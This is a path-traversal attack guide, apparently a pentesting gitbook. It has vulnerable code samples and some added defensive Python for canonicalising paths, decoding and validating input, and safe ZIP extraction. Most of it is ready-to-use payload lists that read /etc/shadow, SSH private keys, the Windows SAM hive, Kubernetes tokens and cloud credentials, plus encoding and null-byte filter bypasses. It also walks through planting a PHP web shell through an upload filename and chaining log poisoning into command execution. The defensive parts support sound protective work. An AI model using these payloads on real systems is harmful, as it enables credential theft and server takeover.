This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Path traversal

Understanding Path Traversal

What is Path Traversal?

Path traversal (also known as directory traversal) is a security vulnerability that allows attackers to access files and directories outside of the intended directory structure. This occurs when applications use user-supplied input to construct file paths without proper validation or sanitization.

Vulnerable Code Example

// PHP vulnerable file reading
$file = $_GET['file'];
$content = file_get_contents('/var/www/html/uploads/' . $file);
echo $content;

Normal Request:

  • URL: GET /view.php?file=document.pdf

  • Path: /var/www/html/uploads/document.pdf

Malicious Request:

  • URL: GET /view.php?file=../../../etc/passwd

  • Path: /var/www/html/uploads/../../../etc/passwd (each ../ steps up one directory; surplus ../ once the filesystem root is reached are ignored, which is why payloads often stack more than strictly needed)

How Path Traversal Works

Path traversal exploits the way operating systems resolve relative path references. By using special directory references like ../ (parent directory) or absolute paths, attackers can navigate outside the intended directory structure to access sensitive files. The root cause is that the application validates (or fails to validate) the raw string, while the operating system only acts on the canonicalised path.
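To make the resolution concrete, here is an added Python example (not code from the original guide) that shows what the naive concatenation above actually opens, and the two fixes a defender wants: canonicalise with realpath and check containment, or avoid user-supplied paths altogether by looking up an identifier in a fixed table. The base directory and the document table are assumptions for the example.

```python
import os
from typing import Optional

# Constructed base directory, mirroring the PHP example above (assumption: the
# application is meant to serve only files beneath this directory).
UPLOAD_DIR = "/var/www/html/uploads"

# Constructed allowlist for endpoints that should select a document by
# identifier rather than by path.
ALLOWED_DOCUMENTS = {
    "terms": "terms.pdf",
    "privacy": "privacy.pdf",
}


def resolve_naively(base: str, user_input: str) -> str:
    """What the vulnerable concatenation actually opens: join the strings and let
    the path normaliser collapse every '..' segment, exactly as the OS would."""
    return os.path.normpath(os.path.join(base, user_input))


def resolve_under_base(base: str, user_input: str) -> Optional[str]:
    """Canonicalise the requested path and refuse anything outside base.

    Returns the absolute path to open, or None when the request must be
    rejected.  realpath also follows symlinks, so a link inside base that
    points outside base is caught as well.
    """
    base_real = os.path.realpath(base)
    # os.path.join discards base entirely if user_input is absolute; the
    # containment check below catches that case along with '..' traversal.
    candidate = os.path.realpath(os.path.join(base_real, user_input))
    # Compare with a trailing separator so that a sibling such as
    # /var/www/html/uploads_old does not pass as "inside" the base.
    if candidate == base_real or candidate.startswith(base_real + os.sep):
        return candidate
    return None


def resolve_by_identifier(base: str, doc_id: str) -> Optional[str]:
    """Strongest form of the fix: the client never supplies a path at all,
    only a key that is looked up in a fixed table."""
    name = ALLOWED_DOCUMENTS.get(doc_id)
    if name is None:
        return None
    return os.path.join(os.path.realpath(base), name)


if __name__ == "__main__":
    for payload in ["document.pdf", "../../../etc/passwd",
                    "../../../../../../etc/passwd", "/etc/passwd"]:
        print(f"{payload!r:35} naive -> {resolve_naively(UPLOAD_DIR, payload):25} "
              f"checked -> {resolve_under_base(UPLOAD_DIR, payload)}")
```

Note that three ../ from /var/www/html/uploads only reach /var; the fourth reaches the root, and any further ../ are dropped, which is the behaviour the naive resolver shows and the checked resolver refuses.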

Common Path Traversal Sequences

Unix/Linux Systems:

  • ../ - Parent directory

  • ./ - Current directory

  • / - Root directory

  • ~ - Home directory

  • // - Alternative root (some systems)

Windows Systems:

  • ..\ - Parent directory

  • .\ - Current directory

  • C:\ - Drive root

  • \\ - UNC path prefix

  • / - Forward slash, also accepted as a separator on Windows

Impact and Consequences

  • Sensitive File Access - Reading configuration files, passwords, keys

  • Source Code Disclosure - Accessing application source code

  • System Information Gathering - Reading system files, logs

  • Credential Harvesting - Accessing password files, tokens

  • Remote Code Execution - In combination with file upload vulnerabilities

  • Denial of Service - Accessing large files or system resources

Common Vulnerable Scenarios

File Download/View Functionality

Document Viewers:

// Vulnerable document viewer
$doc = $_GET['document'];
readfile('/var/www/docs/' . $doc);

Image Galleries:

// Vulnerable image display
$image = $_GET['img'];
header('Content-Type: image/jpeg');
readfile('/var/www/images/' . $image);

Log File Viewers:

// Vulnerable log viewer
$logfile = $_POST['log'];
echo file_get_contents('/var/log/app/' . $logfile);

File Upload Paths

Upload Directory Specification:

# Vulnerable upload path (Flask-style request object)
import os
from flask import request

upload_dir = request.form['directory']
filename = request.files['file'].filename
# os.path.join discards every earlier component once it meets an absolute one,
# so an absolute 'directory' or filename replaces '/uploads/' entirely
filepath = os.path.join('/uploads/', upload_dir, filename)

Template File Access:

// Vulnerable template loading
String template = request.getParameter("template");
File templateFile = new File("/app/templates/" + template);

Include/Require Operations

Dynamic File Inclusion:

// Vulnerable include
$page = $_GET['page'];
include('/var/www/pages/' . $page . '.php');

Configuration File Loading:

# Vulnerable config loading (Flask-style request object)
from flask import request

config_file = request.args.get('config')
with open(f'/app/config/{config_file}', 'r') as f:
    config = f.read()

Basic Path Traversal Techniques

Simple Directory Traversal

Basic Dot-Dot-Slash

Linux/Unix Traversal:

# Move up one directory
../etc/passwd

# Move up multiple directories  
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd

# Access system files
../../../etc/shadow
../../../root/.bash_history
../../../var/log/auth.log

Windows Traversal:

# Windows directory traversal
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\users\administrator\desktop\passwords.txt

Absolute Path Access

Direct Absolute Paths:

# Linux absolute paths
/etc/passwd
/etc/shadow
/root/.ssh/id_rsa
/var/log/apache2/access.log

# Windows absolute paths
C:\windows\system32\drivers\etc\hosts
C:\users\administrator\documents\passwords.txt
C:\inetpub\wwwroot\web.config

Mixed Traversal Techniques

Combining Relative and Absolute:

# Start with relative, end with absolute
../../../etc/passwd
../../../../../../etc/passwd

# Mixed separators (Windows)
../../../windows\system32\drivers\etc\hosts
..\..\..\windows/system32/drivers/etc/hosts

URL Encoding Bypass

Single URL Encoding

Basic URL Encoding:

# Encoded dot-dot-slash
%2e%2e%2f → ../
%2e%2e%5c → ..\

# Full path encoding
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd

# Windows path encoding
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
→ ..\..\..\windows\system32\drivers\etc\hosts

Double URL Encoding

Double-Encoded Sequences:

# Double encoded dot-dot-slash
%252e%252e%252f → %2e%2e%2f → ../
%252e%252e%255c → %2e%2e%5c → ..\

# Double encoded paths
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
→ %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd

Unicode and UTF-8 Encoding

Unicode Variations:

# Unicode dot representations
\u002e\u002e\u002f → ../
\u002e\u002e\u005c → ..\

# Overlong (invalid) two-byte UTF-8 sequences: %c0%ae is an overlong '.', %c0%af an overlong '/', %c1%9c an overlong '\'
%c0%ae%c0%ae%c0%af → ../
%c0%ae%c0%ae%c1%9c → ..\

# Overlong UTF-8 encoding
%e0%80%ae%e0%80%ae%e0%80%af → ../

Filter Evasion Techniques

Null Byte Injection

Null Byte Termination:

# Null byte to bypass extension checks
../../../etc/passwd%00.txt
../../../etc/passwd%00.pdf
../../../etc/passwd\0.jpg

# Multiple null bytes
../../../etc/passwd%00%00.txt

Case Variation

Mixed Case Paths:

# Case variations
../../../ETC/passwd
../../../Etc/Passwd
../../../etc/PASSWD

# Windows case insensitive
..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\Windows\System32\Drivers\Etc\Hosts

Alternative Separators

Different Path Separators:

# Forward slash on Windows
../../../windows/system32/drivers/etc/hosts

# Backslash on Unix (if processed)
..\..\..\etc\passwd

# Mixed separators
../../../windows\system32/drivers\etc/hosts
..\..\..\windows/system32\drivers/etc\hosts

Character Substitution

Alternative Character Representations:

# Backslash variations
.%5c.%5c.%5cetc%5cpasswd
.%2f.%2f.%2fetc%2fpasswd

# Alternative dot representations
%2e%2e/etc/passwd
%2E%2E/etc/passwd

# Space and tab characters
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd
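The encoded and whitespace variants above all defeat a filter that inspects the raw parameter for "../". The added Python example below (not from the original guide) shows the defensive counterpart: decode every layer first, let the strict UTF-8 decoder refuse the overlong sequences, then validate the canonical string for null bytes, absolute paths and stream-wrapper prefixes (the php:// forms listed later on the page), and parent-directory segments. The reason strings and the three-round decoding limit are the example's own choices.

```python
import re
from typing import Tuple
from urllib.parse import unquote

# Rejection reasons returned by check_path (labels chosen for this example)
BAD_ENCODING = "invalid percent-encoding or UTF-8"
TOO_MANY_LAYERS = "too many encoding layers"
NULL_BYTE = "null byte"
ABSOLUTE_OR_WRAPPER = "absolute path or stream wrapper"
PARENT_SEGMENT = "parent-directory segment"

_IIS_UNICODE = re.compile(r"%u([0-9a-fA-F]{4})")
_DRIVE = re.compile(r"^[A-Za-z]:")
# Any scheme-like prefix (php:, data:, jar:, file:) is refused; colons have no
# place in a file name a client may choose, so this is the conservative choice.
_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def decode_fully(raw: str, max_rounds: int = 3) -> str:
    """Peel off encoding layers until the string stops changing.

    Each round first expands IIS-style %uXXXX escapes, then standard %XX
    escapes.  errors='strict' makes Python's UTF-8 decoder raise on overlong
    forms such as %c0%ae or %e0%80%ae, so those never turn into '.' here.
    More than max_rounds - 1 layers is treated as hostile (ValueError).
    """
    current = raw
    for _ in range(max_rounds):
        step = _IIS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), current)
        step = unquote(step, encoding="utf-8", errors="strict")
        if step == current:
            return current
        current = step
    raise ValueError(TOO_MANY_LAYERS)


def check_path(raw: str) -> Tuple[bool, str]:
    """Validate a user-supplied relative file name.

    Returns (True, canonical_path) or (False, reason).  Validation runs on the
    fully decoded value, so every encoded variant collapses to the same '..'
    that a plain filter would catch.
    """
    try:
        decoded = decode_fully(raw)
    except UnicodeDecodeError:
        return False, BAD_ENCODING
    except ValueError as exc:
        return False, str(exc)

    if "\x00" in decoded:
        return False, NULL_BYTE

    # Treat '\' and '/' alike: Windows accepts both, and some Unix code paths
    # pass backslashes through unchanged.
    normalized = decoded.replace("\\", "/")
    if normalized.startswith("/") or _DRIVE.match(decoded) or _SCHEME.match(decoded):
        return False, ABSOLUTE_OR_WRAPPER

    # Strip surrounding whitespace before comparing so '.. ', '..\t' and '..\n'
    # (which Windows and some parsers trim) are still recognised as '..'.
    for segment in normalized.split("/"):
        if segment.strip(" \t\r\n") == "..":
            return False, PARENT_SEGMENT

    return True, normalized


if __name__ == "__main__":
    for payload in ["document.pdf", "%252e%252e%252fetc%252fpasswd",
                    "%c0%ae%c0%ae%c0%af", "..%09/..%09/etc/passwd",
                    "php://filter/resource=x", "../../../etc/passwd%00.txt"]:
        print(f"{payload!r:40} -> {check_path(payload)}")
```

The validator is deliberately stricter than the realpath containment check: any ".." segment is refused even when it would stay inside the base directory, which keeps the rule simple and makes rejected requests easy to log and alert on.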

Advanced Path Traversal Techniques

Deep Directory Traversal

Excessive Dot-Dot Sequences

Over-Traversal:

# More traversals than needed
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd

# Windows over-traversal
..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts

Nested Path Construction

Complex Path Building:

# Nested relative paths
dir1/../dir2/../../../etc/passwd
folder/../subfolder/../../etc/passwd
app/data/../../../etc/passwd

# Mixed absolute and relative
/var/www/../../../etc/passwd
C:\inetpub\..\..\..\windows\system32\drivers\etc\hosts

Application-Specific Bypasses

Framework-Specific Techniques

PHP Path Traversal:

# PHP stream wrappers
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# PHP input streams
php://input
php://stdin

Java Path Traversal:

# Java classpath access
../../../WEB-INF/classes/application.properties
../../../WEB-INF/web.xml
../../../META-INF/MANIFEST.MF

# JAR file access
jar:file:../../../app.jar!/config.properties

ASP.NET Path Traversal:

# ASP.NET configuration
../../../web.config
../../../global.asax
../../../bin/application.dll.config

# IIS specific
../../../inetpub/wwwroot/web.config

Operating System Specific

Linux-Specific Paths:

# Process information
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/version
../../../proc/meminfo

# System configuration
../../../etc/hostname
../../../etc/issue
../../../etc/resolv.conf
../../../etc/hosts

Windows-Specific Paths:

# Windows registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam

# Windows system information
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\windows\system.ini

Filter Bypass Combinations

Multi-Encoding Techniques

Layered Encoding:

# URL + Unicode
%u002e%u002e%u002f → ../
%u002e%u002e%u005c → ..\

# Double URL + Case
%252E%252E%252F → %2E%2E%2F → ../
%252e%252e%252f → %2e%2e%2f → ../

# Triple encoding
%25252e%25252e%25252f → %252e%252e%252f → %2e%2e%2f → ../

Whitespace and Special Characters

Whitespace Injection:

# Spaces in paths
../ ../../../etc/passwd
..%20/..%20/..%20/etc/passwd

# Tab characters
..%09/..%09/..%09/etc/passwd

# Newlines and carriage returns
..%0a/..%0a/..%0a/etc/passwd
..%0d/..%0d/..%0d/etc/passwd

Path Normalization Bypass

Path Segment Manipulation:

# Redundant path segments
./../../etc/passwd
.././../etc/passwd
..//../../etc/passwd

# Self-referencing paths
./../.././../etc/passwd
././../../etc/passwd

Platform-Specific Exploitation

Linux/Unix Systems

System File Access

Password and Authentication:

# User account information
../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/sudoers

# SSH keys and configuration
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../etc/ssh/sshd_config
../../../home/user/.ssh/id_rsa

System Configuration:

# Network configuration
../../../etc/hosts
../../../etc/resolv.conf
../../../etc/network/interfaces
../../../etc/hostname

# System information
../../../proc/version
../../../proc/cpuinfo
../../../proc/meminfo
../../../etc/issue
../../../etc/os-release

Log Files:

# System logs
../../../var/log/syslog
../../../var/log/auth.log
../../../var/log/daemon.log
../../../var/log/kern.log

# Application logs
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/mysql/error.log

Application Files

Web Server Configuration:

# Apache configuration
../../../etc/apache2/apache2.conf
../../../etc/apache2/sites-enabled/000-default
../../../etc/httpd/conf/httpd.conf

# Nginx configuration
../../../etc/nginx/nginx.conf
../../../etc/nginx/sites-enabled/default

Database Configuration:

# MySQL configuration
../../../etc/mysql/my.cnf
../../../var/lib/mysql/mysql/user.MYD

# PostgreSQL configuration
../../../etc/postgresql/postgresql.conf
../../../var/lib/postgresql/data/pg_hba.conf

Windows Systems

System File Access

System Configuration:

# Windows system files
..\..\..\windows\win.ini
..\..\..\windows\system.ini
..\..\..\windows\system32\drivers\etc\hosts

# Registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam

User Data:

# User profiles
..\..\..\users\administrator\desktop\passwords.txt
..\..\..\users\administrator\documents\database.mdb
..\..\..\users\administrator\appdata\roaming\application\config.ini

# Application data
..\..\..\programdata\application\config.xml
..\..\..\program files\application\config\database.conf

IIS and ASP.NET Files

IIS Configuration:

# IIS configuration
..\..\..\inetpub\wwwroot\web.config
..\..\..\windows\system32\inetsrv\config\applicationhost.config

# ASP.NET files
..\..\..\inetpub\wwwroot\bin\application.dll.config
..\..\..\inetpub\wwwroot\global.asax
..\..\..\inetpub\wwwroot\app_data\database.mdf

Windows Services:

# Service configuration
..\..\..\windows\system32\config\software
..\..\..\program files\service\config.xml
..\..\..\programdata\service\settings.ini

Web Application Context Exploitation

File Download Vulnerabilities

Document Management Systems

Download Endpoint Exploitation:

# Document download
GET /download?file=../../../etc/passwd
GET /document/view?path=../../../etc/shadow
POST /file/get
Content-Type: application/x-www-form-urlencoded
filename=../../../var/log/auth.log

PDF/Document Viewers:

# PDF viewer exploitation
GET /pdf/view?document=../../../etc/passwd
GET /doc/display?file=../../../root/.ssh/id_rsa
GET /report/generate?template=../../../etc/mysql/my.cnf

Image and Media Galleries

Image Gallery Exploitation:

# Image viewer
GET /gallery/image?file=../../../etc/passwd
GET /media/view?img=../../../var/log/apache2/access.log

# Thumbnail generation
GET /thumb/generate?image=../../../etc/shadow
POST /image/resize
Content-Type: application/json
{"image": "../../../root/.bash_history"}

File Upload Vulnerabilities

Upload Path Manipulation

Directory Traversal in Upload:

# Upload to arbitrary location
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../var/www/html/shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

ZIP File Extraction (Zip Slip):

# Malicious ZIP with path traversal
# Create ZIP with entry: ../../../var/www/html/backdoor.php
# When extracted, places file outside intended directory
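As an added example (not code from the original guide), the following Python shows how an extractor should treat archive entries: the same canonicalise-and-contain rule, applied to every entry before anything is written, plus a refusal of symlink entries, which a later entry could otherwise write through. The archive is constructed in memory as a test fixture with placeholder contents, and the destination directory is an assumption.

```python
import io
import os
import re
import stat
import zipfile
from typing import List, Tuple

_DRIVE = re.compile(r"^[A-Za-z]:")


def build_sample_archive() -> bytes:
    """Constructed test fixture: one benign entry and three hostile ones (a
    '../' entry like the one described above, an absolute path, and a symlink
    entry).  All contents are placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", b"benign content")
        zf.writestr("../../../var/www/html/backdoor.php", b"placeholder payload")
        zf.writestr("/etc/cron.d/job", b"placeholder payload")
        link = zipfile.ZipInfo("link")
        # Unix mode lives in the high 16 bits of external_attr
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, b"../../etc")
    return buf.getvalue()


SAMPLE_ARCHIVE = build_sample_archive()


def classify_entries(archive: bytes, dest: str) -> List[Tuple[str, str]]:
    """Decide, per entry, whether writing it would stay inside dest.

    Build the full target path, canonicalise it, and require that it lies
    under the canonical destination; refuse absolute names and symlinks.
    """
    dest_real = os.path.realpath(dest)
    results = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            name = info.filename
            if stat.S_ISLNK(info.external_attr >> 16):
                results.append((name, "reject: symlink entry"))
                continue
            if name.startswith(("/", "\\")) or _DRIVE.match(name):
                results.append((name, "reject: absolute path"))
                continue
            target = os.path.realpath(os.path.join(dest_real, name.replace("\\", "/")))
            if target != dest_real and not target.startswith(dest_real + os.sep):
                results.append((name, "reject: escapes destination"))
                continue
            results.append((name, "ok"))
    return results


def safe_extract(archive: bytes, dest: str) -> List[str]:
    """Write only the entries classify_entries accepted; returns written paths."""
    accepted = {name for name, verdict in classify_entries(archive, dest) if verdict == "ok"}
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.filename not in accepted or info.is_dir():
                continue
            target = os.path.join(os.path.realpath(dest), info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


if __name__ == "__main__":
    for name, verdict in classify_entries(SAMPLE_ARCHIVE, "/srv/extract"):
        print(f"{name!r:45} {verdict}")
```

Python's own zipfile.extractall strips leading ".." components, but many archive libraries in other ecosystems do not, and a symlink entry is still worth refusing explicitly; classifying before extracting keeps the decision independent of whatever the library happens to do.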

Template and Include Vulnerabilities

Template Engine Exploitation

Template Path Traversal:

# Template inclusion
GET /render?template=../../../etc/passwd
POST /template/process
Content-Type: application/json
{
  "template": "../../../var/log/auth.log",
  "data": {"user": "admin"}
}

Server-Side Include (SSI):

# SSI file inclusion
GET /page.shtml?include=../../../etc/passwd
GET /template.html?file=../../../proc/version

Advanced Exploitation Scenarios

Chained Attacks

Path Traversal to RCE

File Upload + Path Traversal:

# Step 1: Upload malicious file
POST /upload
filename=shell.php
content=<?php system($_GET['c']); ?>

# Step 2: Access via path traversal
GET /view?file=../uploads/shell.php&c=whoami

Log Poisoning + Path Traversal:

# Step 1: Poison log file via User-Agent
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

# Step 2: Include log file
GET /view?file=../../../var/log/apache2/access.log&cmd=id

Information Gathering Chain

Configuration Discovery:

# Step 1: Find application type
GET /view?file=../../../etc/issue

# Step 2: Target specific configs
GET /view?file=../../../etc/apache2/sites-enabled/000-default

# Step 3: Extract database credentials
GET /view?file=../../../var/www/html/config.php

# Step 4: Access database files
GET /view?file=../../../var/lib/mysql/mysql/user.MYD

Container and Cloud Exploitation

Docker Container Escape

Container File Access:

# Container metadata
../../../proc/self/cgroup
../../../proc/self/mountinfo

# Docker socket access
../../../var/run/docker.sock

# Host filesystem access (if mounted)
../../../host/etc/passwd
../../../host/root/.ssh/id_rsa

Kubernetes Pod Escape

Service Account Access:

# Service account token
../../../var/run/secrets/kubernetes.io/serviceaccount/token

# Kubernetes API access
../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Pod metadata
../../../proc/self/environ

Cloud Metadata Access

AWS Instance Metadata:

# Via SSRF through path traversal
GET /proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Local file with cloud credentials
../../../home/ec2-user/.aws/credentials
../../../root/.aws/config

Language and Framework Specific

PHP Applications

PHP-Specific Vulnerabilities

PHP Stream Wrappers:

# PHP filter wrapper
php://filter/convert.base64-encode/resource=../../../etc/passwd

# PHP input wrapper
php://input

# Data wrapper
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# Expect wrapper (if enabled)
expect://whoami

Include/Require Exploitation:

// Vulnerable PHP include
<?php
$page = $_GET['page'];
include($page . '.php');
?>

// Exploitation
GET /index.php?page=../../../etc/passwd%00
GET /index.php?page=php://filter/convert.base64-encode/resource=config

PHP Configuration Files

Common PHP Targets:

# PHP configuration
../../../etc/php/7.4/apache2/php.ini
../../../usr/local/etc/php/php.ini

# Application configs
../../../var/www/html/wp-config.php
../../../var/www/html/config.php
../../../var/www/html/.env

Java Applications

Java-Specific Paths

Java Application Files:

# Spring Boot configuration
../../../application.properties
../../../application.yml
../../../config/application.properties

# Web application files
../../../WEB-INF/web.xml
../../../WEB-INF/classes/application.properties
../../../META-INF/MANIFEST.MF

Class Path Traversal:

# Java class files
../../../WEB-INF/classes/com/company/app/Config.class
../../../WEB-INF/lib/application.jar

# Log4j configuration
../../../WEB-INF/classes/log4j.properties
../../../WEB-INF/classes/log4j2.xml

Python Applications

Python-Specific Files

Python Application Files:

# Python configuration
../../../settings.py
../../../config.py
../../../requirements.txt

# Django specific
../../../manage.py
../../../settings/local.py
../../../static/admin/

# Flask specific
../../../app.py
../../../config/development.py

Python Virtual Environments

Virtual Environment Access:

# Virtual environment files
../../../venv/pyvenv.cfg
../../../env/lib/python3.8/site-packages/

# Python cache files
../../../__pycache__/settings.cpython-38.pyc

Node.js Applications

Node.js Specific Files

Node.js Configuration:

# Package and configuration files
../../../package.json
../../../package-lock.json
../../../.env
../../../config/default.json

# Node modules
../../../node_modules/express/package.json
../../../node_modules/.bin/

Process and Environment:

# Process information
../../../proc/self/environ
../../../proc/self/cmdline

# Node.js specific
../../../.npmrc
../../../yarn.lock
